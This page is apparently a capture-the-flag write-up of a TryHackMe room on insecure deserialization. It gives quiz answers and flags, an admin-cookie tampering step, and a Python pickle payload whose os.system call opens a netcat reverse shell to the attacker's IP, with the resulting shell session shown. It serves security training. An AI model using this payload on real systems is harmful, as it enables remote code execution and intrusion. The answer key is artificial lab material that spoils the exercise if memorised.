
<!DOCTYPE HTML>
<html lang="" >
    <head>
        <meta charset="UTF-8">
        <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
        <title>Insecure Deserialization · GitBook</title>
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <meta name="description" content="">
        <meta name="generator" content="GitBook 3.2.3">
        
        
        
    
    <link rel="stylesheet" href="../../gitbook/style.css">

    
            
                
                <link rel="stylesheet" href="../../gitbook/gitbook-plugin-highlight/website.css">
                
            
                
                <link rel="stylesheet" href="../../gitbook/gitbook-plugin-search/search.css">
                
            
                
                <link rel="stylesheet" href="../../gitbook/gitbook-plugin-fontsettings/website.css">
                
            
        

    

    
        
    
        
    
        
    
        
    
        
    
        
    

        
    
    
    <meta name="HandheldFriendly" content="true"/>
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <link rel="apple-touch-icon-precomposed" sizes="152x152" href="../../gitbook/images/apple-touch-icon-precomposed-152.png">
    <link rel="shortcut icon" href="../../gitbook/images/favicon.ico" type="image/x-icon">

    
    <link rel="next" href="ComponentsWithKnownVulnerabilities.html" />
    
    
    <link rel="prev" href="Cross-SiteScripting.html" />
    

    </head>
    <body>
        
<div class="book">
    <div class="book-summary">
        
            
<div id="book-search-input" role="search">
    <input type="text" placeholder="Type to search" />
</div>

            
                <nav role="navigation">
                


<ul class="summary">
    
    

    

    
        
        
    
        <li class="chapter " data-level="1.1" data-path="../../">
            
                <a href="../../">
            
                    
                    Introduction
            
                </a>
            

            
        </li>
    

    
        
        <li class="header">TryHackMe</li>
        
        
    
        <li class="chapter " data-level="2.1" data-path="../">
            
                <a href="../">
            
                    
                    TryHackMe Overview
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2" data-path="../AdventofCyber2/">
            
                <a href="../AdventofCyber2/">
            
                    
                    Advent of Cyber 2
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="2.2.1" data-path="../AdventofCyber2/Day01-ChristmasCrisis.html">
            
                <a href="../AdventofCyber2/Day01-ChristmasCrisis.html">
            
                    
                    Day 01 - Christmas Crisis
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2.2" data-path="../AdventofCyber2/Day02-TheElfStrikesBack.html">
            
                <a href="../AdventofCyber2/Day02-TheElfStrikesBack.html">
            
                    
                    Day 02 - The Elf Strikes Back!
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2.3" data-path="../AdventofCyber2/Day03-ChristmasChaos.html">
            
                <a href="../AdventofCyber2/Day03-ChristmasChaos.html">
            
                    
                    Day 03 - Christmas Chaos
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2.4" data-path="../AdventofCyber2/Day04-Santa'sWatching.html">
            
                <a href="../AdventofCyber2/Day04-Santa'sWatching.html">
            
                    
                    Day 04 - Santa's Watching
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2.5" data-path="../AdventofCyber2/Day05-SomeonestoleSanta'sgiftlist.html">
            
                <a href="../AdventofCyber2/Day05-SomeonestoleSanta'sgiftlist.html">
            
                    
                    Day 05 - Someone stole Santa's gift list!
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2.6" data-path="../AdventofCyber2/Day06-XSS.html">
            
                <a href="../AdventofCyber2/Day06-XSS.html">
            
                    
                    Day 06 - Be careful with what you wish on a Christmas night
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2.7" data-path="../AdventofCyber2/Day07-Wireshark.html">
            
                <a href="../AdventofCyber2/Day07-Wireshark.html">
            
                    
                    Day 07 - The Grinch Really Did Steal Christmas
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2.8" data-path="../AdventofCyber2/Day08-Nmap.html">
            
                <a href="../AdventofCyber2/Day08-Nmap.html">
            
                    
                    Day 08 - What's Under the Christmas Tree?
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2.9" data-path="../AdventofCyber2/Day09-AnyonecanbeSanta.html">
            
                <a href="../AdventofCyber2/Day09-AnyonecanbeSanta.html">
            
                    
                    Day 09 - Anyone can be Santa!
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2.10" data-path="../AdventofCyber2/Day10-Don'tbesElfish.html">
            
                <a href="../AdventofCyber2/Day10-Don'tbesElfish.html">
            
                    
                    Day 10 - Don't be sElfish!
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2.11" data-path="../AdventofCyber2/Day11-TheRogueGnome.html">
            
                <a href="../AdventofCyber2/Day11-TheRogueGnome.html">
            
                    
                    Day 11 - The Rogue Gnome
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2.12" data-path="../AdventofCyber2/Day12-Ready,set,elf.html">
            
                <a href="../AdventofCyber2/Day12-Ready,set,elf.html">
            
                    
                    Day 12 - Ready, set, elf
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2.13" data-path="../AdventofCyber2/Day13-CoalforChristmas.html">
            
                <a href="../AdventofCyber2/Day13-CoalforChristmas.html">
            
                    
                    Day 13 - Coal for Christmas
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2.14" data-path="../AdventofCyber2/Day14-Where'sRudolph.html">
            
                <a href="../AdventofCyber2/Day14-Where'sRudolph.html">
            
                    
                    Day 14 - Where's Rudolph?
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2.15" data-path="../AdventofCyber2/Day15-There'saPythoninmystocking.html">
            
                <a href="../AdventofCyber2/Day15-There'saPythoninmystocking.html">
            
                    
                    Day 15 - There's a Python in my stocking!
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2.16" data-path="../AdventofCyber2/Day16-Help!WhereisSanta.html">
            
                <a href="../AdventofCyber2/Day16-Help!WhereisSanta.html">
            
                    
                    Day 16 - Help! Where is Santa?
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2.17" data-path="../AdventofCyber2/Day17-ReverseELFneering.html">
            
                <a href="../AdventofCyber2/Day17-ReverseELFneering.html">
            
                    
                    Day 17 - ReverseELFneering
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2.18" data-path="../AdventofCyber2/Day18-TheBitsofChristmas.html">
            
                <a href="../AdventofCyber2/Day18-TheBitsofChristmas.html">
            
                    
                    Day 18 - The Bits of Christmas
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2.19" data-path="../AdventofCyber2/Day19-TheNaughtyorNiceList.html">
            
                <a href="../AdventofCyber2/Day19-TheNaughtyorNiceList.html">
            
                    
                    Day 19 - The Naughty or Nice List
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2.20" data-path="../AdventofCyber2/Day20-PowershELlFtotherescue.html">
            
                <a href="../AdventofCyber2/Day20-PowershELlFtotherescue.html">
            
                    
                    Day 20 - PowershELlF to the rescue
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2.21" data-path="../AdventofCyber2/Day21-TimeforsomeELForensics.html">
            
                <a href="../AdventofCyber2/Day21-TimeforsomeELForensics.html">
            
                    
                    Day 21 - Time for some ELForensics
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2.22" data-path="../AdventofCyber2/Day22-ElfMcEagerbecomesCyberElf.html">
            
                <a href="../AdventofCyber2/Day22-ElfMcEagerbecomesCyberElf.html">
            
                    
                    Day 22 - Elf McEager becomes CyberElf
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2.23" data-path="../AdventofCyber2/Day23-TheGrinchstrikesagain.html">
            
                <a href="../AdventofCyber2/Day23-TheGrinchstrikesagain.html">
            
                    
                    Day 23 - The Grinch strikes again!
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.2.24" data-path="../AdventofCyber2/Day24-TheTrialBeforeChristmas.html">
            
                <a href="../AdventofCyber2/Day24-TheTrialBeforeChristmas.html">
            
                    
                    Day 24 - The Trial Before Christmas
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="2.3" data-path="../WebFundamentals.html">
            
                <a href="../WebFundamentals.html">
            
                    
                    Web Fundamentals
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.4" data-path="../Anonymous.html">
            
                <a href="../Anonymous.html">
            
                    
                    Anonymous
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.5" data-path="../PrinterHacking101.html">
            
                <a href="../PrinterHacking101.html">
            
                    
                    Printer Hacking 101
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.6" data-path="./">
            
                <a href="./">
            
                    
                    OWASP Top 10
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="2.6.1" data-path="Injection.html">
            
                <a href="Injection.html">
            
                    
                    Injection
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.6.2" data-path="BrokenAuthentication.html">
            
                <a href="BrokenAuthentication.html">
            
                    
                    Broken Authentication
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.6.3" data-path="SensitiveDataExposure.html">
            
                <a href="SensitiveDataExposure.html">
            
                    
                    Sensitive Data Exposure
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.6.4" data-path="XMLExternalEntity.html">
            
                <a href="XMLExternalEntity.html">
            
                    
                    XML External Entity
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.6.5" data-path="BrokenAccessControl.html">
            
                <a href="BrokenAccessControl.html">
            
                    
                    Broken Access Control
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.6.6" data-path="SecurityMisconfiguration.html">
            
                <a href="SecurityMisconfiguration.html">
            
                    
                    Security Misconfiguration
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.6.7" data-path="Cross-SiteScripting.html">
            
                <a href="Cross-SiteScripting.html">
            
                    
                    Cross-Site Scripting
            
                </a>
            

            
        </li>
    
        <li class="chapter active" data-level="2.6.8" data-path="InsecureDeserialization.html">
            
                <a href="InsecureDeserialization.html">
            
                    
                    Insecure Deserialization
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.6.9" data-path="ComponentsWithKnownVulnerabilities.html">
            
                <a href="ComponentsWithKnownVulnerabilities.html">
            
                    
                    Components with Known Vulnerabilities
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.6.10" data-path="InsufficentLoggingMonitoring.html">
            
                <a href="InsufficentLoggingMonitoring.html">
            
                    
                    Insufficent Logging & Monitoring
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="2.7" data-path="../Vulnversity.html">
            
                <a href="../Vulnversity.html">
            
                    
                    Vulnversity
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.8" data-path="../Nmap.html">
            
                <a href="../Nmap.html">
            
                    
                    Nmap
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.9" data-path="../GoogleDorking.html">
            
                <a href="../GoogleDorking.html">
            
                    
                    Google Dorking
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.10" data-path="../Blog.html">
            
                <a href="../Blog.html">
            
                    
                    Blog
            
                </a>
            

            
        </li>
    

    
        
        <li class="header">HackTheBox</li>
        
        
    
        <li class="chapter " data-level="3.1" data-path="../../HackTheBox/">
            
                <a href="../../HackTheBox/">
            
                    
                    HackTheBox Overview
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="3.2" data-path="../../HackTheBox/Emdeefiveforlife.html">
            
                <a href="../../HackTheBox/Emdeefiveforlife.html">
            
                    
                    Emdee five for life
            
                </a>
            

            
        </li>
    

    
        
        <li class="header">VulnCon2020</li>
        
        
    
        <li class="chapter " data-level="4.1" data-path="../../VulnCon2020/">
            
                <a href="../../VulnCon2020/">
            
                    
                    VulnCon2020 Overview
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="4.2" data-path="../../VulnCon2020/NoobBotWelcomesYou.html">
            
                <a href="../../VulnCon2020/NoobBotWelcomesYou.html">
            
                    
                    Noob Bot Welcomes You!
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="4.3" data-path="../../VulnCon2020/Maze.html">
            
                <a href="../../VulnCon2020/Maze.html">
            
                    
                    Maze
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="4.4" data-path="../../VulnCon2020/Pcaped.html">
            
                <a href="../../VulnCon2020/Pcaped.html">
            
                    
                    Pcaped
            
                </a>
            

            
        </li>
    

    

    <li class="divider"></li>

    <li>
        <a href="https://www.gitbook.com" target="blank" class="gitbook-link">
            Published with GitBook
        </a>
    </li>
</ul>


                </nav>
            
        
    </div>

    <div class="book-body">
        
            <div class="body-inner">
                
                    

<div class="book-header" role="navigation">
    

    <!-- Title -->
    <h1>
        <i class="fa fa-circle-o-notch fa-spin"></i>
        <a href="../.." >Insecure Deserialization</a>
    </h1>
</div>




                    <div class="page-wrapper" tabindex="-1" role="main">
                        <div class="page-inner">
                            
<div id="book-search-results">
    <div class="search-noresults">
    
                                <section class="normal markdown-section">
                                
                                <h1 id="insecure-deserialization">Insecure Deserialization</h1>
<p><strong>Date:</strong> 02, January, 2021</p>
<p><strong>Author:</strong> Dhilip Sanjay S</p>
<hr>
<h2 id="serialization-and-deserialization">Serialization and Deserialization</h2>
<ul>
<li><strong>Serialization</strong> is the process of converting objects used in programming into simpler, compatible formatting for transmitting between systems or networks.</li>
<li><strong>Deserialization</strong> is the process of converting serialized information into their complex form - an object that the application will be able to understand.</li>
</ul>
<h2 id="insecure-deserialization">Insecure Deserialization</h2>
<ul>
<li>Insecure Deserialization is a vulnerability which occurs when untrusted data is used to abuse the logic of an application</li>
<li><p>It involves sreplacing data processed by an application with malicious code - allowing DoS to RCE.</p>
</li>
<li><p>Low exploitability - attacker needs to have a good understanding of the inner-workings of the application.</p>
</li>
<li>The exploit is only as dangerous as the attacker&apos;s skill permits.</li>
</ul>
<h2 id="whats-vulnerable">What&apos;s vulnerable?</h2>
<ul>
<li>Any application that stores or fetches data where there are no validations or integrity checks in place for the data queried or retained. </li>
<li>Few examples of applications:<ul>
<li>E-commerce Sites </li>
<li>Forums</li>
<li>API&apos;s</li>
<li>Application Runtimes (Tomcat, Jenkins, Jboss, etc)</li>
</ul>
</li>
</ul>
<hr>
<h2 id="insecure-deserialization---objects">Insecure Deserialization - Objects</h2>
<ul>
<li>In OOP, objects are made up of two things:<ul>
<li>State</li>
<li>Behaviour</li>
</ul>
</li>
</ul>
<hr>
<h2 id="insecure-deserialization---cookies">Insecure Deserialization - cookies</h2>
<ul>
<li>Cookies are tiny peices of data - created and stored by website on the user&apos;s computer.</li>
<li>Cookies store login information like sessionId.</li>
<li>Attributes of cookies:</li>
</ul>
<table>
<thead>
<tr>
<th>Attribute</th>
<th>Description</th>
<th>Required?</th>
</tr>
</thead>
<tbody>
<tr>
<td>Cookie Name</td>
<td>Name of the cookie</td>
<td>Yes</td>
</tr>
<tr>
<td>Cookie Value</td>
<td>Anything Plaintext or encoded</td>
<td>Yes</td>
</tr>
<tr>
<td>Secure Only</td>
<td>If set, this cookie will only be set over HTTPS connection</td>
<td>No</td>
</tr>
<tr>
<td>Expire</td>
<td>Set a timestamp for cookie expiry</td>
<td>No</td>
</tr>
<tr>
<td>Path</td>
<td>Cookie will only be sent if the specified URL is within the request</td>
<td>No</td>
</tr>
</tbody>
</table>
<hr>
<h2 id="solutions">Solutions</h2>
<h3 id="who-developed-the-tomcat-application">Who developed the Tomcat application?</h3>
<ul>
<li><strong>Answer:</strong> The Apache Software Foundation</li>
<li>Initially I thought, James Duncan Davidson. But they actually wanted the organization&apos;s name.</li>
</ul>
<hr>
<h3 id="what-type-of-attack-that-crashes-services-can-be-performed-with-insecure-deserialization">What type of attack that crashes services can be performed with insecure deserialization?</h3>
<h2 id="-answer-denial-of-service">- <strong>Answer:</strong> Denial of Service</h2>
<h3 id="if-a-dog-was-sleeping-would-this-be">If a dog was sleeping, would this be:</h3>
<ul>
<li><strong>Answer:</strong> Behaviour</li>
<li><strong>Note:</strong><ul>
<li>Sleep - State</li>
<li>Sleeping - behaviour</li>
</ul>
</li>
</ul>
<hr>
<h3 id="what-is-the-name-of-the-base-2-formatting-that-data-is-sent-across-a-network-as">What is the name of the base-2 formatting that data is sent across a network as?</h3>
<ul>
<li><strong>Answer:</strong> Binary</li>
</ul>
<hr>
<h3 id="if-a-cookie-had-the-path-of-webappcomlogin--what-would-the-url-that-the-user-has-to-visit-be">If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be?</h3>
<ul>
<li><strong>Answer:</strong> webapp.com/login </li>
</ul>
<hr>
<h3 id="what-is-the-acronym-for-the-web-technology-that-secure-cookies-work-over">What is the acronym for the web technology that Secure cookies work over?</h3>
<ul>
<li><strong>Answer:</strong> HTTPS</li>
</ul>
<hr>
<h3 id="1st-flag-cookie-value">1st flag (cookie value)</h3>
<ul>
<li><strong>Answer:</strong> THM{good_old_base64_huh}</li>
<li><strong>Steps to Reproduce:</strong> <pre><code class="lang-bash">  <span class="hljs-built_in">echo</span> &lt;session-id&gt; | base64 <span class="hljs-_">-d</span>
</code></pre>
</li>
</ul>
<hr>
<h3 id="2nd-flag-admin-dashboard">2nd flag (admin dashboard)</h3>
<ul>
<li><strong>Answer:</strong> THM{heres_the_admin_flag} </li>
<li><strong>Steps to Reproduce:</strong> Change the <code>userType</code> field value to <code>admin</code> in the cookie and reload the page.</li>
</ul>
<hr>
<h3 id="what-is-the-value-in-flagtxt">What is the value in flag.txt?</h3>
<ul>
<li><strong>Answer:</strong> 4a69a7ff9fd68</li>
<li><p><strong>Steps to Reproduce:</strong> </p>
<ul>
<li>Submit a feedback.</li>
<li>You&apos;ll have a cookie named <code>encodedPayload</code>.</li>
<li><p>Replace the value with the one you get from running <code>rce.py</code>.</p>
<pre><code class="lang-python"><span class="hljs-keyword">import</span> pickle
<span class="hljs-keyword">import</span> sys
<span class="hljs-keyword">import</span> base64

command = <span class="hljs-string">&apos;rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2&gt;&amp;1 | netcat YOUR_TRYHACKME_VPN_IP 1234 &gt; /tmp/f&apos;</span>

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">rce</span><span class="hljs-params">(object)</span>:</span>
  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__reduce__</span><span class="hljs-params">(self)</span>:</span>
      <span class="hljs-keyword">import</span> os
      <span class="hljs-keyword">return</span> (os.system,(command,))

print(base64.b64encode(pickle.dumps(rce())))
</code></pre>
<blockquote>
<p>Explanation of the code:</p>
<ul>
<li><code>rm /tmp/f</code> - removes the file if it exists.</li>
<li><code>mkfifo /tmp/f</code> - creates a named IO pipe.</li>
<li><code>cat /tmp/f | /bin/sh -i 2&gt;&amp;1</code> - contents of the named pipe is printed and piped into <code>/bin/sh</code>.</li>
<li><code>netcat YOUR_TRYHACKME_VPN_IP 1234 &gt; /tmp/f</code> <ul>
<li>The output of the commands executed by <code>/bin/sh</code> is directed into stdin of nc.</li>
<li>The output of nc (commands coming over the network) is redirected to the FIFO.</li>
</ul>
</li>
</ul>
</blockquote>
</li>
<li><p>Listen using netcat: <code>nc -lvnp 1234</code></p>
</li>
<li>Reload the page.</li>
<li><p>You will get a reverse shell:</p>
<pre><code class="lang-bash">root@kali: nc -lvnp 1234
listening on [any] 1234 ...
connect to [YOUR_TRYHACKME_VPN_IP] from (UNKNOWN) [MACHINE_IP] 59092
/bin/sh: 0: cant access tty; job control turned off
$ ls
app.py
Dockerfile
index.html
launch.sh
__pycache__
requirements.txt
static
templates
user.html
venv
vimexchange.sock
wsgi.py

$ <span class="hljs-built_in">pwd</span>         
/home/cmnatic/app

$ find / -type f -name flag.txt 2&gt;/dev/null
/home/cmnatic/flag.txt

$ <span class="hljs-built_in">cd</span> ..
$ cat flag.txt
4a69a7ff9fd68
</code></pre>
</li>
</ul>
</li>
</ul>
<hr>

                                
                                </section>
                            
    </div>
    <div class="search-results">
        <div class="has-results">
            
            <h1 class="search-results-title"><span class='search-results-count'></span> results matching "<span class='search-query'></span>"</h1>
            <ul class="search-results-list"></ul>
            
        </div>
        <div class="no-results">
            
            <h1 class="search-results-title">No results matching "<span class='search-query'></span>"</h1>
            
        </div>
    </div>
</div>

                        </div>
                    </div>
                
            </div>

            
                
                <a href="Cross-SiteScripting.html" class="navigation navigation-prev " aria-label="Previous page: Cross-Site Scripting">
                    <i class="fa fa-angle-left"></i>
                </a>
                
                
                <a href="ComponentsWithKnownVulnerabilities.html" class="navigation navigation-next " aria-label="Next page: Components with Known Vulnerabilities">
                    <i class="fa fa-angle-right"></i>
                </a>
                
            
        
    </div>

    <script>
        var gitbook = gitbook || [];
        gitbook.push(function() {
            gitbook.page.hasChanged({"page":{"title":"Insecure Deserialization","level":"2.6.8","depth":2,"next":{"title":"Components with Known Vulnerabilities","level":"2.6.9","depth":2,"path":"TryHackMe/OWASPTop10/ComponentsWithKnownVulnerabilities.md","ref":"TryHackMe/OWASPTop10/ComponentsWithKnownVulnerabilities.md","articles":[]},"previous":{"title":"Cross-Site Scripting","level":"2.6.7","depth":2,"path":"TryHackMe/OWASPTop10/Cross-SiteScripting.md","ref":"TryHackMe/OWASPTop10/Cross-SiteScripting.md","articles":[]},"dir":"ltr"},"config":{"gitbook":"*","theme":"default","variables":{},"plugins":["livereload"],"pluginsConfig":{"livereload":{},"highlight":{},"search":{},"lunr":{"maxIndexSize":1000000,"ignoreSpecialCharacters":false},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2},"theme-default":{"styles":{"website":"styles/website.css","pdf":"styles/pdf.css","epub":"styles/epub.css","mobi":"styles/mobi.css","ebook":"styles/ebook.css","print":"styles/print.css"},"showLevel":false}},"structure":{"langs":"LANGS.md","readme":"README.md","glossary":"GLOSSARY.md","summary":"SUMMARY.md"},"pdf":{"pageNumbers":true,"fontSize":12,"fontFamily":"Arial","paperSize":"a4","chapterMark":"pagebreak","pageBreaksBefore":"/","margin":{"right":62,"left":62,"top":56,"bottom":56}},"styles":{"website":"styles/website.css","pdf":"styles/pdf.css","epub":"styles/epub.css","mobi":"styles/mobi.css","ebook":"styles/ebook.css","print":"styles/print.css"}},"file":{"path":"TryHackMe/OWASPTop10/InsecureDeserialization.md","mtime":"2021-01-02T16:37:02.255Z","type":"markdown"},"gitbook":{"version":"3.2.3","time":"2021-02-13T19:16:38.703Z"},"basePath":"../..","book":{"language":""}});
        });
    </script>
</div>

        
    <script src="../../gitbook/gitbook.js"></script>
    <script src="../../gitbook/theme.js"></script>
    
        
        <script src="../../gitbook/gitbook-plugin-livereload/plugin.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-search/search-engine.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-search/search.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-lunr/lunr.min.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-lunr/search-lunr.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-sharing/buttons.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-fontsettings/fontsettings.js"></script>
        
    

    </body>
</html>

